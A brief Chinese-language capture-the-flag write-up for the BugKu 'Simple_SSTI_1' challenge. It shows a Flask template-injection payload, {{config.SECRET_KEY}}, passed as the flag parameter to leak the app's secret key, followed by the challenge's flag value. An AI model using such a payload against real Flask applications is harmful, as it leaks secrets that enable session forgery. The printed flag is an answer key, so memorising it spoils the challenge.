BugKu CTF Simple_SSTI_1

进入靶场 看见提示

You need pass in a parameter named flag。

需要传入一个名为flag的参数

查看源代码

<!-- You know, in the flask, We often set a secret_key variable.-->

提示进入SECRET_KEY 查看信息

使用hackbar payload：flag={{config.SECRET_KEY}}

得到flag：flag{afa73b5c73f223cbf3e8998ca39bc8e8}